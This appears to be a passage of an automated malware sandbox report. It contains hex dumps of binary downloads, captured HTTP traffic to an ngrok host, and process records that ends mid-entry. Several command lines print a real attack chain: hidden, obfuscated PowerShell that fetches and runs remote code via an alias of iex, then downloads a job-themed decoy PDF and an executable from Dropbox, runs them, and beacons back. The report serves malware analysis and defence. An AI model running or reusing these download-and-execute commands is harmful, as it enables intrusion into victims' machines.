                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC738INData Raw: 07 00 00 00 66 89 8d cc fd ff ff 84 c0 0f 84 a0 03 00 00 0f 57 c0 89 8d f8 fc ff ff 66 0f d6 85 54 fd ff ff 89 8d 54 fd ff ff 89 8d 58 fd ff ff 89 8d 5c fd ff ff c6 45 fc 0d 6a 21 89 8d ec fc ff ff 89 8d 90 fd ff ff 89 8d a0 fd ff ff 89 8d a4 fd ff ff 8d 8d 90 fd ff ff 68 c8 09 4b 00 e8 de 96 ff ff 8d 85 ec fc ff ff c6 45 fc 0e 50 8d 85 f8 fc ff ff 8b cf 50 8d 85 90 fd ff ff 50 8d 85 d8 fd ff ff 50 e8 f7 a2 00 00 50 8d 8d 54 fd ff ff e8 bb 1b 00 00 8b 8d d8 fd ff ff 85 c9 74 58 8b 85 e0 fd ff ff 2b c1 c1 f8 02 8d 14 85 00 00 00 00 8b c1 81 fa 00 10 00 00 72 14 8b 48 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 ef 10 00 00 52 51 e8 12 10 06 00 83 c4 08 c7 85 d8 fd ff ff 00 00 00 00 c7 85 dc fd ff ff 00 00 00 00 c7 85 e0 fd ff ff 00 00 00 00 c6 45 fc 0d 8b 8d
                                                                                                                                                                                                                                                                  Data Ascii: fWfTTX\Ej!hKEPPPPPTtX+rH#+RQE
                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC16384INData Raw: 50 3b 8d b0 fd ff ff 74 0e e8 62 a9 ff ff 83 85 ac fd ff ff 18 eb 11 ff b5 ac fd ff ff 8d 8d a8 fd ff ff e8 58 a7 ff ff c6 45 fc 0d 8b 8d e0 fd ff ff 83 f9 08 72 35 8b 95 cc fd ff ff 8d 0c 4d 02 00 00 00 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 68 0e 00 00 51 52 e8 9f 0d 06 00 83 c4 08 83 85 ec fc ff ff 04 47 8b 8d 54 fd ff ff 3b bd f8 fc ff ff 0f 8c 0a fe ff ff c6 45 fc 0b 85 c9 0f 84 9a 00 00 00 8b 85 5c fd ff ff 8b 95 54 fd ff ff 2b c1 c1 f8 02 8d 0c 85 00 00 00 00 8b c2 81 f9 00 10 00 00 72 14 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 25 0e 00 00 51 52 e8 39 0d 06 00 eb 58 a1 88 8c 4c 00 85 c0 75 36 68 84 00 00 00 e8 f4 0c 06 00 8b f0 89 b5 e4 fd ff ff 68 84 00 00 00 6a 00 56 c6 45 fc 10 e8 b3 2e 06 00 83 c4
                                                                                                                                                                                                                                                                  Data Ascii: P;tbXEr5MrP#+hQRGT;E\T+rP#+%QR9XLu6hhjVE.
                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC16054INData Raw: 50 51 56 57 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 89 7d f0 8b 75 08 8d 47 04 0f 57 c0 c7 07 a4 f8 49 00 50 66 0f d6 00 8d 46 04 50 e8 44 e1 05 00 83 c4 08 c7 45 fc 00 00 00 00 8d 4f 10 c7 07 b4 1b 4b 00 8b 46 0c 89 47 0c 8d 46 10 50 e8 c7 6a ff ff c7 07 c4 12 4b 00 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 1d 81 49 00 64 a1 00 00 00 00 50 51 56 57 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f9 89 7d f0 8b 75 08 8d 47 04 0f 57 c0 c7 07 a4 f8 49 00 50 66 0f d6 00 8d 46 04 50 e8 b4 e0 05 00 83 c4 08 c7 45 fc 00 00 00 00 8d 4f 10 c7 07 b4 1b 4b 00 8b 46 0c 89 47 0c 8d 46 10 50 e8 37 6a ff ff c7 07 0c 1c 4b 00 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b
                                                                                                                                                                                                                                                                  Data Ascii: PQVW@L3PEd}uGWIPfFPDEOKFGFPjKMdY_^]UjhIdPQVW@L3PEd}uGWIPfFPEOKFGFP7jKMdY_^
                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC16384INData Raw: 4b 00 c7 45 dc 00 00 00 00 c7 45 ec 00 00 00 00 c7 45 f0 00 00 00 00 e8 ae a5 ff ff 0f 57 c0 c7 45 fc 00 00 00 00 66 0f d6 46 04 8d 45 dc c6 45 fc 01 50 8d 4e 10 c7 06 b4 1b 4b 00 c7 46 0c 00 00 00 00 e8 22 2c ff ff 8b 4d f0 c7 06 f0 1b 4b 00 83 f9 10 72 28 8b 55 dc 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 22 51 52 e8 d7 8e 05 00 83 c4 08 c7 06 88 0f 4b 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 e8 e0 8a 06 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 15 87 49 00 64 a1 00 00 00 00 50 83 ec 24 56 a1 14 40 4c 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 d8 89 75 d4 8d 4d dc 6a 37 68 28 19 4b 00 c7 45 dc 00 00 00 00 c7 45 ec 00 00 00 00 c7 45 f0 00 00 00 00 e8 ce a4 ff ff 0f 57 c0
                                                                                                                                                                                                                                                                  Data Ascii: KEEEWEfFEEPNKF",MKr(UArP#+w"QRKMdY^]UjhIdP$V@L3PEduuMj7h(KEEEW
                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC330INData Raw: 11 00 0f 11 40 10 c7 40 20 00 00 00 00 c7 40 18 00 00 00 00 c7 00 00 00 00 00 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 c7 40 0c 00 00 00 00 c7 40 10 00 00 00 00 c7 40 14 00 00 00 00 33 c0 c7 45 c0 00 00 00 00 c7 45 d0 00 00 00 00 c7 45 d4 07 00 00 00 66 89 45 c0 89 45 fc 8d 4d c0 8b 85 28 fd ff ff 6a 01 68 a8 f2 4a 00 8b 30 8b 40 04 89 85 28 fd ff ff e8 df e3 fe ff 8b 85 20 fd ff ff 8b d0 83 78 14 08 72 02 8b 10 8b ca 8d 41 02 89 85 24 fd ff ff 0f 1f 40 00 66 8b 01 83 c1 02 66 85 c0 75 f5 2b 8d 24 fd ff ff d1 f9 51 52 8d 4d c0 e8 a3 e3 fe ff 6a 02 68 ac f2 4a 00 8d 4d c0 e8 94 e3 fe ff 3b b5 28 fd ff ff 74 53 83 7e 14 08 8b d6 72 02 8b 16 8b c2 8d 48 02 89 8d 24 fd ff ff 0f 1f 80 00 00 00 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b 85 24 fd ff ff 8d 4d c0 d1
                                                                                                                                                                                                                                                                  Data Ascii: @@ @@@@@@3EEEfEEM(jhJ0@( xrA$@ffu+$QRMjhJM;(tS~rH$ffu+$M
                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC16384INData Raw: 19 83 79 14 08 8b c1 72 02 8b 01 ff 71 10 8d 4d d8 50 e8 e9 e1 fe ff 8b 45 e8 85 c0 74 47 33 c9 40 ba 02 00 00 00 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 64 50 05 00 83 7d ec 08 8d 4d d8 8b f0 0f 43 4d d8 51 8b 4d e8 41 51 56 e8 4f 4a 06 00 83 c4 10 56 ff 15 58 e2 49 00 85 c0 75 50 56 e8 32 50 05 00 83 c4 04 ff 15 30 e1 49 00 8b 8d 34 fd ff ff 51 89 01 8b 8d 2c fd ff ff e8 51 05 00 00 85 ff 0f 84 18 04 00 00 83 7d ec 08 8d 45 d8 8b 37 0f 43 45 d8 50 68 c8 20 4b 00 68 10 1f 4b 00 68 60 ea 4a 00 6a 32 57 e9 5d 04 00 00 8b ce 8d 51 02 66 8b 01 83 c1 02 66 85 c0 75 f5 2b ca d1 f9 51 56 8d 4d d8 e8 36 e1 fe ff 56 e8 c4 4f 05 00 8b b5 2c fd ff ff 8d 95 3c fd ff ff 83 c4 04 c7 85 78 ff ff ff 44 00 00 00 83 7d ec 08 8d 4d d8 0f 57 c0 8d 45 c0 0f 43 4d d8 83 7d d4 08 57
                                                                                                                                                                                                                                                                  Data Ascii: yrqMPEtG3@QdP}MCMQMAQVOJVXIuPV2P0I4Q,Q}E7CEPh KhKh`Jj2W]Qffu+QVM6VO,<xD}MWECM}W
                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC16384INData Raw: 8b f8 83 c4 04 89 7d e0 8b 45 ec 8b 40 04 85 c0 74 0c 8b 70 18 85 f6 75 0a 8d 70 1c eb 05 be ca 0c 4b 00 6a 00 8d 4d ac e8 9a fb 04 00 c7 45 b0 00 00 00 00 c6 45 b4 00 c7 45 b8 00 00 00 00 c6 45 bc 00 33 c0 c7 45 c0 00 00 00 00 66 89 45 c4 89 45 c8 66 89 45 cc 89 45 d0 88 45 d4 89 45 d8 88 45 dc c6 45 fc 08 85 f6 0f 84 e5 00 00 00 8d 45 ac 56 50 e8 3b fe 04 00 c7 47 04 00 00 00 00 c7 07 b8 06 4a 00 8d 45 ac c6 45 fc 09 50 e8 6c fe 04 00 8b 45 d8 83 c4 0c 85 c0 74 09 50 e8 df 09 06 00 83 c4 04 8b 45 d0 c7 45 d8 00 00 00 00 85 c0 74 09 50 e8 c8 09 06 00 83 c4 04 8b 45 c8 c7 45 d0 00 00 00 00 85 c0 74 09 50 e8 b1 09 06 00 83 c4 04 8b 45 c0 c7 45 c8 00 00 00 00 85 c0 74 09 50 e8 9a 09 06 00 83 c4 04 8b 45 b8 c7 45 c0 00 00 00 00 85 c0 74 09 50 e8 83 09 06 00
                                                                                                                                                                                                                                                                  Data Ascii: }E@tpupKjMEEEE3EfEEfEEEEEEEVP;GJEEPlEtPEEtPEEtPEEtPEEtP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:43 UTC16384INData Raw: 8b cf ff 15 d4 e2 49 00 8b cb ff d7 8b bd 74 ff ff ff 0f b7 c0 b9 ff ff 00 00 66 3b c8 74 09 c6 46 04 00 e9 0a ff ff ff c7 06 00 00 00 00 c6 46 04 01 e9 fb fe ff ff 85 c0 0f 85 a6 00 00 00 80 7e 04 00 75 07 8b ce e8 54 07 00 00 8b 85 68 ff ff ff 0f b7 5e 06 8b 00 8b 78 0c 8b cf ff 15 d4 e2 49 00 8b 8d 68 ff ff ff ff d7 66 3b d8 75 6f e8 70 2e 06 00 8b 8d 7c ff ff ff 8b 00 8a 00 88 01 41 8b 1e 89 8d 7c ff ff ff 85 db 74 47 8b 43 1c 83 38 00 74 1b 8b 4b 2c 8b 01 85 c0 7e 12 48 89 01 8b 4b 1c 8b 11 8d 42 02 89 01 0f b7 02 eb 14 8b 03 8b 78 1c 8b cf ff 15 d4 e2 49 00 8b cb ff d7 0f b7 c0 b9 ff ff 00 00 66 3b c8 74 06 c6 46 04 00 eb 0a c7 06 00 00 00 00 c6 46 04 01 8b bd 74 ff ff ff 83 bd 64 ff ff ff 00 0f 85 d9 00 00 00 80 7e 04 00 75 07 8b ce e8 a1 06 00 00
                                                                                                                                                                                                                                                                  Data Ascii: Itf;tFF~uTh^xIhf;uop.|A|tGC8tK,~HKBxIf;tFFtd~u


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  27192.168.2.6498743.124.142.2054438924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:49 UTC221OUTGET /metadata/921edf0e40341466669afb0baebb3d6e HTTP/1.1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                  Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  2024-12-19 12:44:50 UTC213INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 207
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:50 GMT
                                                                                                                                                                                                                                                                  Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:50 UTC207INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                                  Start time:07:44:06
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)
                                                                                                                                                                                                                                                                  Imagebase:0x7ff765b60000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                  Start time:07:44:06
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                  Start time:07:44:06
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aacb48 curl ; sal avc0f6 iEx ; avc0f6(aacb48 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e -UseBasicParsing)
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                                  Start time:07:44:21
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                                  Start time:07:44:21
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7403e0000
                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                                  Start time:07:44:21
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                                  Start time:07:44:22
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=2152,i,15865133504281396123,895058618401071371,262144 /prefetch:3
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                                  Start time:07:44:23
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2780 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:3
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                  Start time:07:44:27
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\749209598.bat" "
                                                                                                                                                                                                                                                                  Imagebase:0x7ff765b60000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                  Start time:07:44:27
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                  Start time:07:44:27
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5296 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                  Start time:07:44:27
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5284 --field-trial-handle=2484,i,14725035999492342870,3352432587190736551,262144 /prefetch:8
                                                                                                                                                                                                                                                                  Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                  File size:4'210'216 bytes
                                                                                                                                                                                                                                                                  MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                  Start time:07:44:27
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e'; }"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                                  Start time:07:44:29
                                                                                                                                                                                                                                                                  Start date:19/12/2024
                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
